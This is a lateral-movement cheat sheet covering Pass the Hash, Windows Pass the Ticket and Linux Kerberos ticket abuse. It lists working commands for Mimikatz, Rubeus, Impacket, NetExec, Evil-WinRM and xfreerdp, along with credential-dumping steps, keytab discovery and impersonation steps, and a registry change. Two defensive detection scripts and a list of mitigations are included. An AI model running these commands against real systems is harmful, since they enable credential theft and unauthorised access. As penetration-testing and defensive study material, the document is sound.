Windows Lateral Movement

1. Pass the Hash (PtH) Attack

Core Concept

  • Authenticates with the user's NT password hash instead of the plaintext password

  • No need to crack or decrypt the hash; it is used as-is

  • Works because the hash stays static until the password changes, so a captured hash remains a valid credential

Windows NTLM Authentication Key Points

  • Challenge-response authentication protocol

  • Still common despite known flaws (legacy compatibility)

  • NT hashes are unsalted, so the hash itself is a reusable, password-equivalent credential (the root cause of PtH)

Requirements

  • Administrative privileges (or equivalent specific privileges, e.g. the debug privilege enabled by privilege::debug) on the host from which hashes are dumped

  • Ways to obtain hashes:

    • Dumping local SAM database

    • Extracting from NTDS database (ntds.dit) on Domain Controller

    • Pulling from memory (lsass.exe)

Attack Methods & Tools

1. Mimikatz (Windows)

mimikatz.exe privilege::debug "sekurlsa::pth /user:username /rc4:NTLM_HASH /domain:domain.htb /run:cmd.exe" exit

Required parameters:

  • /user - Target username

  • /rc4 or /NTLM - NTLM hash

  • /domain - Domain name (use computer name/localhost/. for local)

  • /run - Program to execute (default: cmd.exe)

2. PowerShell Invoke-TheHash

# SMB Method
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target IP -Domain domain.htb -Username user -Hash HASH -Command "command"

# WMI Method
Invoke-WMIExec -Target hostname -Domain domain.htb -Username user -Hash HASH -Command "command"

3. Impacket (Linux)

# -hashes takes LM:NT; the leading colon leaves the LM part empty
impacket-psexec administrator@IP -hashes :HASH
# wmiexec, atexec and smbexec take the same target and -hashes arguments
impacket-wmiexec
impacket-atexec
impacket-smbexec

4. CrackMapExec / NetExec (Linux)

# NetExec (netexec) is the maintained successor of CrackMapExec; same syntax
# Network scan with hash (-d . = local account)
netexec smb IP/24 -u Administrator -d . -H HASH

# Command execution
netexec smb IP -u Administrator -d . -H HASH -x "command"

5. Evil-WinRM (Linux)

evil-winrm -i IP -u Administrator -H HASH

6. RDP Pass the Hash (Linux)

# Enable Restricted Admin Mode on target (value 0 enables it; requires local admin on the target):
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# Connect:
xfreerdp /v:IP /u:username /pth:HASH

Important PtH Considerations

  • UAC remote restrictions limit PtH with local accounts: a remote logon as a local admin other than RID-500 receives a filtered (non-elevated) token

  • LocalAccountTokenFilterPolicy (under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System) controls that filtering:

    • 0 (default) = only the built-in Administrator (RID-500) gets a full token remotely

    • 1 = all local admins get a full token remotely

  • Domain accounts with local admin rights are not subject to this filtering

2. Windows Pass the Ticket (PtT) Attack

Overview

  • Definition: A PtT attack leverages stolen Kerberos tickets (TGT or TGS) to move laterally in an Active Directory (AD) environment

  • Purpose: Exploits Kerberos authentication mechanisms without requiring NTLM password hashes or plaintext credentials

Kerberos Protocol Fundamentals

Key Concepts

  1. Ticket-Based Authentication:

    • Designed to minimize password sharing across services

    • Tickets authenticate users without transmitting passwords

  2. Kerberos Components:

    • TGT (Ticket Granting Ticket): Obtained after initial authentication; used to request service tickets (TGS)

    • TGS (Ticket Granting Service): The KDC service that issues service tickets for specific services (the service ticket itself is often loosely called a "TGS" as well)

Ticket Harvesting Tools

1. Mimikatz

# Extract tickets
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

2. Rubeus

# Dump tickets from memory as Base64 (no line wrapping)
Rubeus.exe dump /nowrap

# Request a TGT with the NT hash (overpass-the-hash) and inject it into the current session
Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /rc4:[HASH] /ptt

# Import .kirbi ticket
Rubeus.exe ptt /ticket:[TICKET_FILENAME].kirbi

Lateral Movement Techniques

PowerShell Remoting

# Using Mimikatz
kerberos::ptt "[TICKET_FILENAME].kirbi"
Enter-PSSession -ComputerName [TARGET]

# Using Rubeus
Rubeus.exe createnetonly /program:"cmd.exe" /show
Rubeus.exe ptt /ticket:[TICKET_FILENAME].kirbi
Enter-PSSession -ComputerName [TARGET]
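As a detection counterpart to the ticket tooling above, the following is an added example and not part of the original cheat sheet. Rubeus asktgt with /rc4 asks the KDC for a TGT using the NT hash, so the domain controller's 4768 event carries TicketEncryptionType 0x17 (RC4-HMAC) even for an account whose normal logons negotiate AES. The script builds a per-account baseline of encryption types from constructed 4768 records (one JSON object per line; field names are assumed to match the 4768 EventData) and flags an RC4 request from an account that has only ever used AES:

```python
"""Added example (not from the original page): spotting RC4-based Kerberos
TGT requests from accounts that otherwise use AES.  Only event 4768 (TGT
request) is considered: the encryption type in 4769 (service ticket request)
reflects the service account's keys, so an AES user legitimately receives
RC4 service tickets for an RC4-only service.  Records are constructed."""
from __future__ import annotations

import json
from typing import Iterable

RC4_HMAC = 0x17
AES_TYPES = {0x11, 0x12}  # aes128-cts-hmac-sha1-96, aes256-cts-hmac-sha1-96

# Constructed sample 4768 records (users, addresses and times are made up).
SAMPLE_EVENTS = [
    '{"TimeCreated":"2024-05-01T08:00:01Z","EventID":4768,"TargetUserName":"julio",'
    '"IpAddress":"10.10.1.20","TicketEncryptionType":"0x12","Status":"0x0"}',
    # an account that has only ever used RC4: no AES baseline, so no alert
    '{"TimeCreated":"2024-05-01T08:05:00Z","EventID":4768,"TargetUserName":"svc_legacy",'
    '"IpAddress":"10.10.1.50","TicketEncryptionType":"0x17","Status":"0x0"}',
    '{"TimeCreated":"2024-05-01T08:30:00Z","EventID":4768,"TargetUserName":"JULIO",'
    '"IpAddress":"10.10.1.20","TicketEncryptionType":"0x12","Status":"0x0"}',
    # same account, later, RC4 from a different source address
    '{"TimeCreated":"2024-05-01T09:30:12Z","EventID":4768,"TargetUserName":"julio",'
    '"IpAddress":"10.10.1.77","TicketEncryptionType":"0x17","Status":"0x0"}',
    # a failed request (non-zero Status) carries no usable encryption type
    '{"TimeCreated":"2024-05-01T09:31:00Z","EventID":4768,"TargetUserName":"julio",'
    '"IpAddress":"10.10.1.77","TicketEncryptionType":"0x17","Status":"0x6"}',
]


def account_key(name: str) -> str:
    """Normalise 'julio', 'JULIO' and 'julio@DOMAIN.HTB' to one baseline key."""
    return name.split("@", 1)[0].lower()


def find_rc4_downgrades(lines: Iterable[str]) -> list[dict]:
    """Walk successful 4768 events in time order; flag an RC4 TGT request from
    an account whose earlier successful requests were all AES."""
    events = [json.loads(line) for line in lines if line.strip()]
    events.sort(key=lambda ev: ev["TimeCreated"])
    baseline: dict[str, set[int]] = {}
    alerts: list[dict] = []
    for ev in events:
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue
        acct = account_key(ev["TargetUserName"])
        etype = int(ev["TicketEncryptionType"], 16)
        seen = baseline.setdefault(acct, set())
        if etype == RC4_HMAC and seen and seen <= AES_TYPES:
            alerts.append({
                "time": ev["TimeCreated"],
                "account": acct,
                "source": ev.get("IpAddress"),
                "baseline": sorted(hex(t) for t in seen),
            })
            continue  # do not let the suspicious request widen the baseline
        seen.add(etype)
    return alerts


if __name__ == "__main__":
    for alert in find_rc4_downgrades(SAMPLE_EVENTS):
        print(f'{alert["time"]} {alert["account"]} from {alert["source"]}: '
              f'RC4 TGT request, account baseline was {alert["baseline"]}')
```

The baseline is deliberately per account rather than domain-wide: a legacy service account that has always used RC4 is noise, while an AES-capable user suddenly requesting RC4 from a new address is the case worth a look.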

3. Linux Pass the Ticket (PtT) Attack

Key Linux Kerberos Attack Concepts

  • Leveraging Kerberos tickets on Linux machines integrated with Active Directory

  • Tickets and keys are stored in keytab files (long-term keys) and credential caches (ccache files)

  • Typical locations: /etc/krb5.keytab for the host keytab, /tmp/krb5cc_* for user credential caches
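The storage locations above are also what a defender should audit on an AD-joined Linux host. The following is an added example, not part of the original cheat sheet: it walks a directory tree and flags any keytab or krb5cc_* credential cache that group or other users can read or write, since a readable ccache is a usable ticket for any other local user. The demo tree (file names and modes) is constructed in a temporary directory; ownership is not checked because the demo cannot create files owned by other users:

```python
"""Added example (not from the original page): permission audit for Kerberos
credential files on Linux.  Keytabs and credential caches should be mode
0600; anything wider is reported.  The demo tree is constructed."""
from __future__ import annotations

import os
import stat
import tempfile


def is_kerberos_credential_file(name: str) -> str | None:
    """Classify a file name as 'keytab', 'ccache' or None (not of interest)."""
    lower = name.lower()
    if "keytab" in lower:
        return "keytab"
    if lower.startswith("krb5cc"):
        return "ccache"
    return None


def check_file(path: str) -> list[str]:
    """Report a file whose mode grants any access to group or others."""
    mode = stat.S_IMODE(os.lstat(path).st_mode)
    findings = []
    if mode & 0o077:
        findings.append(f"{path}: mode {mode:04o} grants access to group/others (expect 0600)")
    return findings


def audit_tree(root: str) -> list[str]:
    """Walk root and return sorted findings for keytab and ccache files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            kind = is_kerberos_credential_file(name)
            if kind is None:
                continue
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue  # do not follow symlinks into other locations
            for finding in check_file(path):
                findings.append(f"[{kind}] {finding}")
    return sorted(findings)


def build_demo_tree() -> str:
    """Create a constructed sample layout under a temporary directory.

    File names mirror the ones used in this section; contents are placeholders."""
    root = tempfile.mkdtemp(prefix="krb-audit-demo-")
    layout = {
        "etc/krb5.keytab": 0o600,                 # host keytab, correctly locked down
        "opt/specialfiles/carlos.keytab": 0o644,  # user keytab readable by everyone
        "tmp/krb5cc_1000": 0o600,                 # ccache with expected permissions
        "tmp/krb5cc_647401106": 0o644,            # ccache readable by other local users
        "tmp/notes.txt": 0o644,                   # unrelated file, ignored
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"constructed placeholder, not a real credential\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for line in audit_tree(demo_root) or ["no findings"]:
        print(line)
```

Run against a real host, audit_tree("/") (as root) gives the same report; pair it with ownership checks (keytabs root-owned, each ccache owned by the user whose UID is in its name) for a complete picture.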

Attack Methodology

Ticket Discovery

# Check domain integration
realm list

# Find keytab files
find / -name '*keytab*' -ls 2>/dev/null
ls -la /tmp

# Check authentication services
ps -ef | grep -i "winbind\|sssd"

User Impersonation

# Inspect keytab file
klist -k -t /opt/specialfiles/carlos.keytab

# Impersonate the user whose key is in the keytab (carlos; [DOMAIN] is the Kerberos realm)
kinit carlos@[DOMAIN] -k -t /opt/specialfiles/carlos.keytab
klist

# Access network resources
smbclient //dc01/carlos -k -c ls

Additional Attack Techniques

# Point Kerberos-aware tools at an existing credential cache
export KRB5CCNAME=/home/user/krb5cc_647401106

# Use Impacket with Kerberos
proxychains impacket-wmiexec dc01 -k

# Convert between ccache (Linux) and .kirbi (Windows) ticket formats
impacket-ticketConverter krb5cc_ticket julio.kirbi

Post-Exploitation

  • Check sudo privileges with sudo -l

  • Use tools like Linikatz for credential extraction

  • Potential privilege escalation paths

Mitigation Strategies

  • Implement strong password policies and rotate passwords, since a captured hash stays valid until the password changes

  • Use Multi-Factor Authentication (MFA)

  • Limit administrative privileges (fewer accounts able to dump the SAM, NTDS or lsass.exe) and keep LocalAccountTokenFilterPolicy at 0

  • Regularly update and patch systems

  • Monitor and log authentication events (NTLM logons, Kerberos ticket requests, access to lsass.exe, keytab and ccache files on Linux hosts)

  • Use advanced endpoint protection